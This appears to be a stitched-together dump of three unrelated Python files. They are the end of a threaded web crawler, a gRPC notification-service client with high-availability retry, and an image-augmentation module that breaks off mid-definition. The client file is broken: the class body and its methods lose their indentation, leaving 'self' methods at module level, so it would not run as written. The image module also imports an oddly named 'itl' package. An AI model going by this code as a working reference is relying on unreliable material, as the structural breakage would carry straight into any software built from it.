# shared work queue of URLs for the worker threads
queue = Queue()
# instantiating Spider initializes the project files (side effect only)
Spider(PROJECT_NAME, HOMEPAGE, DOMAIN_NAME)
# Create worker threads (will die when main exits)
def create_workers():
    """Spawn NUMBER_OF_THREADS daemon worker threads running work()."""
    for _ in range(NUMBER_OF_THREADS):
        worker = threading.Thread(target=work, daemon=True)
        worker.start()
# Do the next job in the queue
def work():
    """
    Worker loop: pull the next URL off the queue, crawl it, repeat forever.

    Runs in a daemon thread, so it is killed when the main thread exits.
    """
    while True:
        url = queue.get()
        Spider.crawl_page(threading.current_thread().name, url)
        # unblocks queue.join() once all queued URLs are done
        queue.task_done()
# Each queued link is a new job
def create_jobs():
    """
    Queue every link currently in the queue file, wait for the workers to
    drain them, then re-check for newly discovered links via crawl().

    NOTE(review): create_jobs -> crawl -> create_jobs is mutual recursion;
    a very long crawl could exceed the recursion limit -- confirm this is
    acceptable for the expected crawl sizes.
    """
    for link in file_to_set(QUEUE_FILE):
        queue.put(link)
    queue.join()
    crawl()
# Check if there are items in the queue, if so crawl them
def crawl():
    """Report and dispatch any links waiting in the queue file."""
    queued_links = file_to_set(QUEUE_FILE)
    if len(queued_links) > 0:
        print(str(len(queued_links)) + ' links in the queue')
        create_jobs()
# Kick off: spawn the worker pool, then start crawling the initial queue.
create_workers()
crawl()
|
client.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import threading
import os
import uuid
# Iterable lives in collections.abc; importing it from `collections` was
# deprecated since 3.3 and removed in Python 3.10.
from collections.abc import Iterable
from functools import wraps
from random import shuffle
from typing import Union, List, Tuple, Dict, Any

import grpc
import time

from notification_service.base_notification import BaseNotification, EventWatcher, BaseEvent, EventWatcherHandle
from notification_service.proto.notification_service_pb2 \
    import SendEventRequest, ListEventsRequest, EventProto, ReturnStatus, ListAllEventsRequest, \
    GetLatestVersionByKeyRequest, ListMembersRequest
from notification_service.proto import notification_service_pb2_grpc
from notification_service.util.utils import event_proto_to_event, proto_to_member, sleep_and_detecting_running

# Backfill time.time_ns for Python < 3.7.
if not hasattr(time, 'time_ns'):
    time.time_ns = lambda: int(time.time() * 1e9)

# Cast to int: os.environ.get returns a str whenever the variable is set,
# which would otherwise flow into integer timeout fields.
NOTIFICATION_TIMEOUT_SECONDS = int(os.environ.get("NOTIFICATION_TIMEOUT_SECONDS", 5))
ALL_EVENTS_KEY = "_*"
class ThreadEventWatcherHandle(EventWatcherHandle):
    """
    Handle for a listener thread started by NotificationClient.

    stop() signals the thread (via its `_flag` attribute, which the listen
    loop polls), joins it, then removes it from the client's registry.
    """

    def __init__(self,
                 thread: threading.Thread,
                 thread_key: Any,
                 notification_client: 'NotificationClient'):
        self._thread = thread
        self._thread_key = thread_key
        self._notification_client = notification_client

    def stop(self):
        """Stop the watcher thread and deregister it from the client."""
        # The listen loop checks getattr(thread, '_flag', True) each cycle.
        self._thread._flag = False
        self._thread.join()
        # Lock as a context manager replaces the manual
        # acquire()/try/finally/release() sequence.
        with self._notification_client.lock:
            self._notification_client.threads[self._thread_key].remove(self._thread)
class NotificationClient(BaseNotification):
"""
NotificationClient is the notification client.
"""
def __init__(self,
server_uri: str,
default_namespace: str = None,
enable_ha: bool = False,
list_member_interval_ms: int = 5000,
retry_interval_ms: int = 1000,
retry_timeout_ms: int = 10000):
"""
The constructor of the NotificationClient.
:param server_uri: Target server uri/uris. If `enable_ha` is True, multiple uris separated
by "," can be accepted.
:param default_namespace: The default namespace that this client is working on.
:param enable_ha: Enable high-available functionality.
:param list_member_interval_ms: When `enable_ha` is True, this client will request the
living members periodically. A member means a server node
of the Notification server cluster. This param specifies
the interval of the listing member requests.
:param retry_interval_ms: When `enable_ha` is True and a rpc call has failed on all the
living members, this client will retry until success or timeout.
This param specifies the retry interval.
:param retry_timeout_ms: When `enable_ha` is True and a rpc call has failed on all the
living members, this client will retry until success or timeout.
This param specifies the retry timeout.
"""
channel = grpc.insecure_channel(server_uri)
self._default_namespace = default_namespace
self.notification_stub = notification_service_pb2_grpc.NotificationServiceStub(channel)
self.threads = {} # type: Dict[Any, List[threading.Thread]]
self.lock = threading.Lock()
self.enable_ha = enable_ha
self.list_member_interval_ms = list_member_interval_ms
self.retry_interval_ms = retry_interval_ms
self.retry_timeout_ms = retry_timeout_ms
if self.enable_ha:
server_uris = server_uri.split(",")
self.living_members = []
self.current_uri = None
last_error = None
for server_uri in server_uris:
channel = grpc.insecure_channel(server_uri)
notification_stub = notification_service_pb2_grpc.NotificationServiceStub(channel)
try:
request = ListMembersRequest(timeout_seconds=0)
response = notification_stub.listMembers(request)
if response.return_code == ReturnStatus.SUCCESS:
self.living_members = [proto_to_member(proto).server_uri
for proto in response.members]
else:
raise Exception(response.return_msg)
self.current_uri = server_uri
self.notification_stub = notification_stub
break
except grpc.RpcError as e:
last_error = e
if self.current_uri is None:
raise Exception("No available server uri!") from last_error
self.ha_change_lock = threading.Lock()
self.ha_running = True
self.notification_stub = self._wrap_rpcs(self.notification_stub, server_uri)
self.list_member_thread = threading.Thread(target=self._list_members, daemon=True)
self.list_member_thread.start()
def send_event(self, event: BaseEvent):
"""
Send event to Notification Service.
:param event: the event updated.
:return: The created event which has version and create time.
"""
request = SendEventRequest(
event=EventProto(
key=event.key,
value=event.value,
event_type=event.event_type,
context=event.context,
namespace=self._default_namespace if event.namespace is None else event.namespace),
uuid=str(uuid.uuid4()))
response = self.notification_stub.sendEvent(request)
if response.return_code == ReturnStatus.SUCCESS:
return event_proto_to_event(response.event)
else:
raise Exception(response.return_msg)
def list_events(self,
key: Union[str, List[str]],
namespace: str = None,
version: int = None,
event_type: str = None,
start_time: int = None) -> List[BaseEvent]:
"""
List specific events in Notification Service.
:param key: Key of the event for listening.
:param namespace: Namespace of the event for listening.
:param version: (Optional) The version of the events must greater than this version.
:param event_type: (Optional) Type of the events.
:param start_time: (Optional) Start time of the events.
:return: The event list.
"""
if isinstance(key, str):
key = (key,)
elif isinstance(key, Iterable):
key = tuple(key)
request = ListEventsRequest(
keys=key,
start_version=version,
event_type=event_type,
start_time=start_time,
namespace=self._default_namespace if namespace is None else namespace)
response = self.notification_stub.listEvents(request)
if response.return_code == ReturnStatus.SUCCESS:
if response.events is None:
return []
else:
events = []
for event_proto in response.events:
event = event_proto_to_event(event_proto)
events.append(event)
return events
else:
raise Exception(response.return_msg)
def start_listen_event(self,
                       key: Union[str, Tuple[str]],
                       watcher: EventWatcher,
                       namespace: str = None,
                       version: int = None,
                       event_type: str = None,
                       start_time: int = None) -> EventWatcherHandle:
    """
    Start listening for events with the given `key` in the Notification Service.

    :param key: Key (or keys) of the events to listen for.
    :param watcher: Watcher invoked with each batch of newly seen events.
    :param namespace: Namespace of the events; defaults to the client's default namespace.
    :param version: (Optional) Only events with a version greater than this are delivered.
    :param event_type: (Optional) Type of the events to listen for.
    :param start_time: (Optional) Start time of the events to listen for.
    :return: The handle used to stop the listening.
    """
    if isinstance(key, str):
        key = (key,)
    elif isinstance(key, Iterable):
        key = tuple(key)
    namespace = self._default_namespace if namespace is None else namespace

    def list_events(client,
                    k: Tuple[str],
                    v: List[int],
                    t: str = None,
                    ts: int = None,
                    ns: str = None,
                    timeout_seconds: int = None):
        # One long-poll round trip. Returns the new events, or None when the
        # server reports success with no events.
        request = ListEventsRequest(
            keys=k,
            event_type=t,
            start_time=ts,
            start_version=v,
            timeout_seconds=timeout_seconds,
            namespace=ns)
        response = client.notification_stub.listEvents(request)
        if response.return_code == ReturnStatus.SUCCESS:
            if response.events is None:
                return None
            return [event_proto_to_event(proto) for proto in response.events]
        raise Exception(response.return_msg)

    def listen(client, k, v, t, ts, ns, w):
        th = threading.current_thread()
        listen_version = v
        # `_flag` is flipped to False by stop_listen_event to end this loop.
        while getattr(th, '_flag', True):
            notifications = list_events(
                client,
                k,
                listen_version,
                t,
                ts,
                ns,
                NOTIFICATION_TIMEOUT_SECONDS)
            # BUG FIX: list_events returns None on an empty poll; the previous
            # `len(notifications) > 0` raised TypeError in that case. A
            # truthiness check covers both None and [].
            if notifications:
                w.process(notifications)
                listen_version = notifications[-1].version

    thread = threading.Thread(
        target=listen,
        args=(self, key, version, event_type, start_time, namespace,
              watcher),
        daemon=True)
    thread.start()
    self.lock.acquire()
    try:
        # Register the listener thread under its (key, namespace) pair.
        self.threads.setdefault((key, namespace), []).append(thread)
    finally:
        self.lock.release()
    return ThreadEventWatcherHandle(thread, (key, namespace), self)
def stop_listen_event(self, key: Union[str, Tuple[str]] = None, namespace: str = None):
    """
    Stop listening for events with the given `key`.

    :param key: Key(s) of the listener to stop. When None, every keyed
        listener is stopped; the global all-events listeners are left
        running (they are controlled by `stop_listen_events`).
    :param namespace: Namespace of the listener; defaults to the client's
        default namespace.
    """
    namespace = self._default_namespace if namespace is None else namespace
    # BUG FIX: the previous `key is None` branch mutated self.threads without
    # holding the lock and called self.threads.clear(), which also discarded
    # the ALL_EVENTS_KEY entries despite the comment saying global listeners
    # must not be touched here. Hold the lock and delete only keyed entries.
    self.lock.acquire()
    try:
        if key is None:
            for thread_key in list(self.threads.keys()):
                if thread_key == ALL_EVENTS_KEY:
                    # do not stop the global listen threads,
                    # which are controlled by `stop_listen_events`.
                    continue
                for thread in self.threads[thread_key]:
                    thread._flag = False
                    thread.join()
                del self.threads[thread_key]
        else:
            if isinstance(key, str):
                key = (key,)
            if (key, namespace) in self.threads:
                for thread in self.threads[(key, namespace)]:
                    thread._flag = False
                    thread.join()
                del self.threads[(key, namespace)]
    finally:
        self.lock.release()
def list_all_events(self,
                    start_time: int = None,
                    start_version: int = None,
                    end_version: int = None) -> List[BaseEvent]:
    """
    List events from the Notification Service filtered by time/version range.

    :param start_time: (Optional) Start time of the events.
    :param start_version: (Optional) Only events with a version greater than
        this are returned.
    :param end_version: (Optional) Only events with a version equal to or less
        than this are returned.
    :return: The matching events (empty list when there are none).
    """
    request = ListAllEventsRequest(start_time=start_time,
                                   start_version=start_version,
                                   end_version=end_version)
    response = self.notification_stub.listAllEvents(request)
    if response.return_code != ReturnStatus.SUCCESS:
        raise Exception(response.return_msg)
    if response.events is None:
        return []
    return [event_proto_to_event(proto) for proto in response.events]
def start_listen_events(self,
                        watcher: EventWatcher,
                        start_time: int = None,
                        version: int = None) -> EventWatcherHandle:
    """
    Start listening for all events.

    :param watcher: Watcher invoked with each batch of newly seen events.
    :param start_time: (Optional) The earliest event time, in milliseconds.
        Defaults to "now", computed per call. (BUG FIX: the previous default
        `int(time.time() * 1000)` was evaluated once at import time, so every
        later call silently reused that stale timestamp.)
    :param version: (Optional) The start version of the events.
    :return: The handle used to stop the listening.
    """
    if ALL_EVENTS_KEY in self.threads:
        raise Exception("already listen events, must stop first!")
    if start_time is None:
        start_time = int(time.time() * 1000)

    def list_events(client, start, timeout_seconds: int = None):
        # Long-poll by start time; None when success with no events.
        request = ListAllEventsRequest(start_time=start, timeout_seconds=timeout_seconds)
        response = client.notification_stub.listAllEvents(request)
        if response.return_code == ReturnStatus.SUCCESS:
            if response.events is None:
                return None
            return [event_proto_to_event(proto) for proto in response.events]
        raise Exception(response.return_msg)

    def list_events_from_version(client, v, timeout_seconds: int = None):
        # Long-poll by start version; None when success with no events.
        request = ListAllEventsRequest(start_version=v, timeout_seconds=timeout_seconds)
        response = client.notification_stub.listAllEvents(request)
        if response.return_code == ReturnStatus.SUCCESS:
            if response.events is None:
                return None
            return [event_proto_to_event(proto) for proto in response.events]
        raise Exception(response.return_msg)

    def listen(client, s, v, w):
        t = threading.current_thread()
        # Until a start version is known we poll by time; after the first
        # batch (or when `v` is given) we poll by version.
        poll_by_time = v is None
        current_version = 0 if v is None else v
        while getattr(t, '_flag', True):
            if poll_by_time:
                notifications = list_events(client, s, NOTIFICATION_TIMEOUT_SECONDS)
                # BUG FIX: the helpers return None on an empty poll; the
                # previous `len(notifications) > 0` raised TypeError.
                if notifications:
                    w.process(notifications)
                    current_version = notifications[-1].version
                    poll_by_time = False
            else:
                notifications = list_events_from_version(client,
                                                         current_version,
                                                         NOTIFICATION_TIMEOUT_SECONDS)
                if notifications:
                    w.process(notifications)
                    current_version = notifications[-1].version

    thread = threading.Thread(target=listen,
                              args=(self, start_time, version, watcher),
                              daemon=True)
    thread.start()
    self.lock.acquire()
    try:
        self.threads.setdefault(ALL_EVENTS_KEY, []).append(thread)
    finally:
        self.lock.release()
    return ThreadEventWatcherHandle(thread, ALL_EVENTS_KEY, self)
def stop_listen_events(self):
    """Stop and discard the global (all-events) listener threads."""
    with self.lock:
        if ALL_EVENTS_KEY in self.threads:
            # Signal each listener loop to exit, then wait for it.
            for thread in self.threads[ALL_EVENTS_KEY]:
                thread._flag = False
                thread.join()
            del self.threads[ALL_EVENTS_KEY]
def get_latest_version(self, key: str = None, namespace: str = None):
    """
    Get the latest event version for the given key.

    :param key: Key of the events to look up.
    :param namespace: Namespace of the events; defaults to the client's
        default namespace.
    :return: The latest version number for the key, or None when the call
        does not report success. NOTE(review): unlike the sibling RPC
        wrappers, this method does not raise on failure — confirm whether
        silently returning None is intended.
    """
    self.lock.acquire()
    try:
        request = GetLatestVersionByKeyRequest(key=key,
                                               namespace=self._default_namespace if namespace is None else namespace)
        response = self.notification_stub.getLatestVersionByKey(request)
        # NOTE(review): this compares against str(ReturnStatus.SUCCESS) while
        # the sibling methods compare against ReturnStatus.SUCCESS directly —
        # presumably this RPC returns the code as a string; confirm against
        # the proto definition.
        if response.return_code == str(ReturnStatus.SUCCESS):
            return response.version
    finally:
        self.lock.release()
def disable_high_availability(self):
    """Stop the HA member-refresh loop, if HA was ever enabled on this client."""
    if not hasattr(self, "ha_running"):
        # HA was never enabled; nothing to shut down.
        return
    self.ha_running = False
    self.list_member_thread.join()
def _list_members(self):
    """Background loop: refresh `self.living_members` from the server while
    HA is enabled.

    The listMembers RPC long-polls for roughly `list_member_interval_ms`,
    which paces this loop (no explicit sleep is needed).
    """
    while self.ha_running:
        request = ListMembersRequest(timeout_seconds=int(self.list_member_interval_ms / 1000))
        response = self.notification_stub.listMembers(request)
        if response.return_code == ReturnStatus.SUCCESS:
            with self.ha_change_lock:
                self.living_members = [proto_to_member(proto).server_uri
                                       for proto in response.members]
        else:
            # IDIOM FIX: use lazy %-style logging args instead of eager `%`
            # interpolation, so the message is only formatted when emitted.
            logging.error("Exception thrown when updating the living members: %s",
                          response.return_msg)
def _ha_wrapper(self, func):
    """Wrap the RPC `func` with high-availability retry: on grpc.RpcError,
    reconnect to another living member and retry until success, HA shutdown,
    or the retry timeout elapses."""
    @wraps(func)
    def call_with_retry(*args, **kwargs):
        # Resolve the unwrapped stub method by name so we always call the
        # method of the stub currently installed on self.
        current_func = getattr(self.notification_stub,
                               func.__name__).inner_func
        start_time = time.time_ns() / 1000000  # milliseconds
        failed_members = set()
        while True:
            try:
                return current_func(*args, **kwargs)
            except grpc.RpcError:
                logging.error("Exception thrown when calling rpc, change the connection.",
                              exc_info=True)
                with self.ha_change_lock:
                    # check the current_uri to ensure thread safety: another
                    # thread may already have switched the connection.
                    if current_func.server_uri == self.current_uri:
                        living_members = list(self.living_members)
                        failed_members.add(self.current_uri)
                        shuffle(living_members)
                        found_new_member = False
                        # NOTE(review): this loop has no `break`, so it
                        # connects to every remaining non-failed member in
                        # turn and the last one wins — confirm whether a
                        # break after the first healthy member was intended.
                        for server_uri in living_members:
                            if server_uri in failed_members:
                                continue
                            next_uri = server_uri
                            channel = grpc.insecure_channel(next_uri)
                            notification_stub = self._wrap_rpcs(
                                notification_service_pb2_grpc.NotificationServiceStub(channel),
                                next_uri)
                            self.notification_stub = notification_stub
                            current_func = getattr(self.notification_stub,
                                                   current_func.__name__).inner_func
                            self.current_uri = next_uri
                            found_new_member = True
                        if not found_new_member:
                            logging.error("No available living members currently. Sleep and retry.")
                            failed_members.clear()
                            sleep_and_detecting_running(self.retry_interval_ms,
                                                        lambda: self.ha_running)
                # break if stopped or timeout
                if not self.ha_running or \
                        time.time_ns() / 1000000 > start_time + self.retry_timeout_ms:
                    if not self.ha_running:
                        raise Exception("HA has been disabled.")
                    else:
                        raise Exception("Rpc retry timeout!")
    # Expose the raw function so wrapped stubs can be re-resolved by name.
    call_with_retry.inner_func = func
    return call_with_retry
def _wrap_rpcs(self, stub, server_uri):
    """Replace every RPC method on `stub` with an HA retry wrapper bound to
    `server_uri`, and return the same stub."""
    # Snapshot the attribute dict first: setattr mutates it while we iterate.
    for rpc_name, rpc in list(stub.__dict__.items()):
        rpc.__name__ = rpc_name
        rpc.server_uri = server_uri
        setattr(stub, rpc_name, self._ha_wrapper(rpc))
    return stub
|
prepro.py | #! /usr/bin/python
# -*- coding: utf-8 -*-
import copy
import threading
import time
import numpy as np
import itl as tl
import scipy
import scipy.ndimage as ndi
from scipy import linalg
from scipy.ndimage.filters import gaussian_filter
from scipy.ndimage.interpolation import map_coordinates
import skimage
from skimage import exposure
from skimage import transform
from skimage.morphology import disk
from skimage.morphology import erosion as _erosion
from skimage.morphology import binary_dilation as _binary_dilation
from skimage.morphology import binary_erosion as _binary_erosion
from six.moves import range
import PIL
# linalg https://docs.scipy.org/doc/scipy/reference/linalg.html
# ndimage https://docs.scipy.org/doc/scipy/reference/ndimage.html
# Explicit public API of this module; names not listed here are internal.
__all__ = [
    'threading_data',
    'rotation',
    'rotation_multi',
    'crop',
    'crop_multi',
    'flip_axis',
    'flip_axis_multi',
    'shift',
    'shift_multi',
    'shear',
    'shear_multi',
    'shear2',
    'shear_multi2',
    'swirl',
    'swirl_multi',
    'elastic_transform',
    'elastic_transform_multi',
    'zoom',
    'zoom_multi',
    'brightness',
    'brightness_multi',
    'illumination',
    'rgb_to_hsv',
    'hsv_to_rgb',
    'adjust_hue',
    'imresize',
    'pixel_value_scale',
    'samplewise_norm',
    'featurewise_norm',
    'get_zca_whitening_principal_components_img',
    'zca_whitening',
    'channel_shift',
    'channel_shift_multi',
    'drop',
    'transform_matrix_offset_center',
    'apply_transform',
    'projective_transform_by_points',
    'array_to_img',
    'find_contours',
    'pt2map',
    'binary_dilation',
    'dilation',
    'binary_erosion',
    'erosion',
    'obj_box_coords_rescale',
    'obj_box_coord_rescale',
    'obj_box_coord_scale_to_pixelunit',
    'obj_box_coord_centroid_to_upleft_butright',
    'obj_box_coord_upleft_butright_to_centroid',
    'obj_box_coord_centroid_to_upleft',
    'obj_box_coord_upleft_to_centroid',
    'parse_darknet_ann_str_to_list',
    'parse_darknet_ann_list_to_cls_box',
    'obj_box_left_right_flip',
    'obj_box_imresize',
    'obj_box_crop',
    'obj_box_shift',
    'obj_box_zoom',
    'pad_sequences',
    'remove_pad_sequences',
    'process_sequences',
    'sequences_add_start_id',
    'sequences_add_end_id',
    'sequences_add_end_id_after_pad',
    'sequences_get_mask',
]
def threading_data(data=None, fn=None, thread_count=None, **kwargs):
    """Apply `fn` to a batch of data concurrently using threads.

    Usually used for data augmentation.

    Parameters
    -----------
    data : numpy.array or others
        The batch to process.
    fn : function
        The function applied to each element (or to each contiguous slice
        when ``thread_count`` is given).
    thread_count : int
        Number of worker threads. When None, one thread is spawned per
        element of ``data``.
    more args : the keyword args forwarded to ``fn``.

    Returns
    -------
    list or numpy array
        The processed results: per-element results stacked into an array
        (or returned as a list when stacking fails), or the concatenation
        of the per-slice results when ``thread_count`` is given.

    Examples
    --------
    >>> images = tl.prepro.threading_data(images[0:32], tl.prepro.zoom, zoom_range=[0.5, 1])
    """
    def run(out, idx, item, kw):
        # Each worker writes its result into its own slot; no lock needed.
        out[idx] = fn(item, **kw)

    workers = []
    if thread_count is None:
        # One thread per element.
        results = [None] * len(data)
        for idx, item in enumerate(data):
            t = threading.Thread(name='threading_and_return', target=run, args=(results, idx, item, kwargs))
            t.start()
            workers.append(t)
    else:
        # Split data into `thread_count` contiguous slices.
        bounds = np.round(np.linspace(0, len(data), thread_count + 1)).astype(int)
        results = [None] * thread_count
        for idx in range(thread_count):
            t = threading.Thread(
                name='threading_and_return', target=run,
                args=(results, idx, data[bounds[idx]:bounds[idx + 1]], kwargs)
            )
            t.start()
            workers.append(t)

    for t in workers:
        t.join()

    if thread_count is None:
        try:
            return np.asarray(results)
        except Exception:
            # Results with inhomogeneous shapes cannot be stacked.
            return results
    return np.concatenate(results)
def rotation(
    x, rg=20, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0., order=1
):
    """Rotate an image by `rg` degrees, or by a random angle in [-rg, rg].

    Parameters
    -----------
    x : numpy.array
        An image with dimension of [row, col, channel] (default).
    rg : int or float
        Degree to rotate, usually 0 ~ 180.
    is_random : boolean
        If True, pick a random angle in [-rg, rg]. Default is False.
    row_index col_index and channel_index : int
        Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
    fill_mode : str
        How to fill missing pixels: `nearest` (default), `constant`, `reflect` or `wrap`.
    cval : float
        Fill value outside the input when mode=`constant`. Default 0.0.
    order : int
        Interpolation order, 0-5; see ``tl.prepro.apply_transform``.

    Returns
    -------
    numpy.array
        A processed image.
    """
    degrees = np.random.uniform(-rg, rg) if is_random else rg
    theta = np.pi / 180 * degrees
    cos_t, sin_t = np.cos(theta), np.sin(theta)
    rotation_matrix = np.array([[cos_t, -sin_t, 0], [sin_t, cos_t, 0], [0, 0, 1]])
    h, w = x.shape[row_index], x.shape[col_index]
    # Rotate about the image center, not the origin.
    matrix = transform_matrix_offset_center(rotation_matrix, h, w)
    return apply_transform(x, matrix, channel_index, fill_mode, cval, order)
def rotation_multi(
    x, rg=20, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0., order=1
):
    """Rotate multiple images by the same (possibly random) angle.

    Usually used for image segmentation where x=[X, Y] must stay aligned.

    Parameters
    -----------
    x : list of numpy.array
        List of images with dimension of [n_images, row, col, channel] (default).
    others : args
        See ``tl.prepro.rotation``.

    Returns
    -------
    numpy.array
        A list of processed images.
    """
    degrees = np.random.uniform(-rg, rg) if is_random else rg
    theta = np.pi / 180 * degrees
    rotation_matrix = np.array([[np.cos(theta), -np.sin(theta), 0], [np.sin(theta), np.cos(theta), 0], [0, 0, 1]])
    h, w = x[0].shape[row_index], x[0].shape[col_index]
    matrix = transform_matrix_offset_center(rotation_matrix, h, w)
    # One shared transform so paired images (e.g. image + mask) stay aligned.
    return np.asarray([
        apply_transform(img, matrix, channel_index, fill_mode, cval, order) for img in x
    ])
# crop
def crop(x, wrg, hrg, is_random=False, row_index=0, col_index=1):
    """Randomly or centrally crop an image.

    Parameters
    ----------
    x : numpy.array
        An image with dimension of [row, col, channel] (default).
    wrg : int
        Size of width.
    hrg : int
        Size of height.
    is_random : boolean,
        If True, randomly crop, else central crop. Default is False.
    row_index: int
        index of row.
    col_index: int
        index of column.

    Returns
    -------
    numpy.array
        A processed image of shape (hrg, wrg, ...).
    """
    h, w = x.shape[row_index], x.shape[col_index]
    if (h <= hrg) or (w <= wrg):
        raise AssertionError("The size of cropping should smaller than the original image")
    if is_random:
        # BUG FIX: the previous `int(np.random.uniform(0, h - hrg) - 1)` could
        # yield -1, turning the slice into x[-1:hrg-1] and returning an
        # empty/wrong crop. Offsets are now always in [0, h - hrg).
        h_offset = int(np.random.uniform(0, h - hrg))
        w_offset = int(np.random.uniform(0, w - wrg))
        return x[h_offset:hrg + h_offset, w_offset:wrg + w_offset]
    # central crop
    h_offset = int(np.floor((h - hrg) / 2.))
    w_offset = int(np.floor((w - wrg) / 2.))
    return x[h_offset:h_offset + hrg, w_offset:w_offset + wrg]
def crop_multi(x, wrg, hrg, is_random=False, row_index=0, col_index=1):
    """Randomly or centrally crop multiple images with the same offsets.

    Parameters
    ----------
    x : list of numpy.array
        List of images with dimension of [n_images, row, col, channel] (default).
    others : args
        See ``tl.prepro.crop``.

    Returns
    -------
    numpy.array
        A list of processed images, each of shape (hrg, wrg, ...).
    """
    h, w = x[0].shape[row_index], x[0].shape[col_index]
    if (h <= hrg) or (w <= wrg):
        raise AssertionError("The size of cropping should smaller than the original image")
    if is_random:
        # Same -1 offset bug fix as in `crop`: offsets are now always >= 0.
        h_offset = int(np.random.uniform(0, h - hrg))
        w_offset = int(np.random.uniform(0, w - wrg))
        return np.asarray([data[h_offset:hrg + h_offset, w_offset:wrg + w_offset] for data in x])
    # central crop — BUG FIX: the offsets were kept as floats ((h - hrg) / 2),
    # which raises TypeError when used as slice indices on Python 3, and the
    # old `data[h_offset:h - h_offset]` slice returned hrg+1 rows for odd
    # (h - hrg). Floor to int and slice exactly hrg/wrg, matching `crop`.
    h_offset = int(np.floor((h - hrg) / 2.))
    w_offset = int(np.floor((w - wrg) / 2.))
    h_end, w_end = h_offset + hrg, w_offset + wrg
    return np.asarray([data[h_offset:h_end, w_offset:w_end] for data in x])
# flip
def flip_axis(x, axis=1, is_random=False):
    """Flip an image along `axis`, either always or with 50% probability.

    Parameters
    ----------
    x : numpy.array
        An image with dimension of [row, col, channel] (default).
    axis : int
        Which axis to flip: 0 up/down, 1 left/right, 2 channel.
    is_random : boolean
        If True, flip with 50% probability. Default is False.

    Returns
    -------
    numpy.array
        A processed image.
    """
    if is_random and np.random.uniform(-1, 1) <= 0:
        # Random draw said "no flip": return the input unchanged.
        return x
    flipped = np.asarray(x).swapaxes(axis, 0)
    flipped = flipped[::-1, ...]
    return flipped.swapaxes(0, axis)
def flip_axis_multi(x, axis, is_random=False):
    """Flip multiple images along the same axis together, either always or
    with 50% probability (one draw for the whole group).

    Parameters
    -----------
    x : list of numpy.array
        List of images with dimension of [n_images, row, col, channel] (default).
    others : args
        See ``tl.prepro.flip_axis``.

    Returns
    -------
    numpy.array
        A list of processed images.
    """
    if is_random and np.random.uniform(-1, 1) <= 0:
        # Random draw said "no flip": return the group unchanged.
        return np.asarray(x)
    results = []
    for item in x:
        item = np.asarray(item).swapaxes(axis, 0)
        results.append(item[::-1, ...].swapaxes(0, axis))
    return np.asarray(results)
# shift
def shift(
    x, wrg=0.1, hrg=0.1, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
    order=1
):
    """Shift an image by a (possibly random) fraction of its size.

    Parameters
    -----------
    x : numpy.array
        An image with dimension of [row, col, channel] (default).
    wrg : float
        Fraction of shift along axis x, usually -0.25 ~ 0.25.
    hrg : float
        Fraction of shift along axis y, usually -0.25 ~ 0.25.
    is_random : boolean
        If True, sample the shift uniformly from [-hrg, hrg] / [-wrg, wrg].
    row_index col_index and channel_index : int
        Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
    fill_mode : str
        How to fill missing pixels: `nearest` (default), `constant`, `reflect` or `wrap`.
    cval : float
        Fill value outside the input when mode='constant'. Default 0.0.
    order : int
        Interpolation order, 0-5; see ``tl.prepro.apply_transform``.

    Returns
    -------
    numpy.array
        A processed image.
    """
    h, w = x.shape[row_index], x.shape[col_index]
    if is_random:
        tx = np.random.uniform(-hrg, hrg) * h
        ty = np.random.uniform(-wrg, wrg) * w
    else:
        tx, ty = hrg * h, wrg * w
    # A pure translation needs no offset-to-center adjustment.
    transform_matrix = np.array([[1, 0, tx], [0, 1, ty], [0, 0, 1]])
    return apply_transform(x, transform_matrix, channel_index, fill_mode, cval, order)
def shift_multi(
    x, wrg=0.1, hrg=0.1, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
    order=1
):
    """Shift multiple images by the same (possibly random) amount.

    Usually used for image segmentation where x=[X, Y] must stay aligned.

    Parameters
    -----------
    x : list of numpy.array
        List of images with dimension of [n_images, row, col, channel] (default).
    others : args
        See ``tl.prepro.shift``.

    Returns
    -------
    numpy.array
        A list of processed images.
    """
    h, w = x[0].shape[row_index], x[0].shape[col_index]
    if is_random:
        tx = np.random.uniform(-hrg, hrg) * h
        ty = np.random.uniform(-wrg, wrg) * w
    else:
        tx, ty = hrg * h, wrg * w
    # One shared translation so paired images stay aligned; no center offset.
    transform_matrix = np.array([[1, 0, tx], [0, 1, ty], [0, 0, 1]])
    return np.asarray([
        apply_transform(data, transform_matrix, channel_index, fill_mode, cval, order) for data in x
    ])
# shear
def shear(
    x, intensity=0.1, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
    order=1
):
    """Shear an image by a (possibly random) intensity.

    Parameters
    -----------
    x : numpy.array
        An image with dimension of [row, col, channel] (default).
    intensity : float
        Shear fraction, usually -0.5 ~ 0.5 (is_random==True), 0 ~ 0.5 (is_random==False).
    is_random : boolean
        If True, sample the shear uniformly from [-intensity, intensity].
    row_index col_index and channel_index : int
        Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
    fill_mode : str
        How to fill missing pixels: `nearest` (default), `constant`, `reflect` or `wrap`.
    cval : float
        Fill value outside the input when mode='constant'. Default 0.0.
    order : int
        Interpolation order, 0-5; see ``tl.prepro.apply_transform``.

    Returns
    -------
    numpy.array
        A processed image.

    References
    -----------
    - `Affine transformation <https://uk.mathworks.com/discovery/affine-transformation.html>`__
    """
    amount = np.random.uniform(-intensity, intensity) if is_random else intensity
    shear_matrix = np.array([[1, -np.sin(amount), 0], [0, np.cos(amount), 0], [0, 0, 1]])
    h, w = x.shape[row_index], x.shape[col_index]
    # Shear about the image center, not the origin.
    transform_matrix = transform_matrix_offset_center(shear_matrix, h, w)
    return apply_transform(x, transform_matrix, channel_index, fill_mode, cval, order)
def shear_multi(
